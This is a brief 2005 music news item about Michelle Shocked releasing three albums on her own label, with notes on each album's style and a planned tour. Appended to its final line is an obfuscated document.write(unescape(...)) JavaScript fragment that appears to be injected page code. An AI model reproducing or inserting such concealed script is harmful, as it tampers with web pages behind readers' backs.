2005 will be a big year for Michelle Shocked, who will release a new trilogy of albums on June 7th on her own Mighty Sound label through Proper Distribution in the UK. The two-time Grammy nominee will present her "Threesome", continuing the "American Trilogy" concept of her first three Mercury albums.
The first album "Don't Ask Don't Tell" is a rock album produced by Dusty Wakeman. The second album "Got No Strings" features Disney classics done in a Western style swing. The third album, "Mexican Standoff" is half-Latin, half blues.
All three albums will be released separately, and also together as a limited edition box set. The simultaneous releases chronicle a tumultuous time of life -- including her recent divorce. This isn't to imply that the songs are bitter. In fact, to the contrary they're executed with humour, imagination, irony and empowerment -- and in voices most have never heard from Michelle. There's rock and after-hours blues, hardcore punk and twang shading her sly lyrics.
Michelle will be undertaking a major UK and Europe in July. Full tour dates will be announced shortly.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
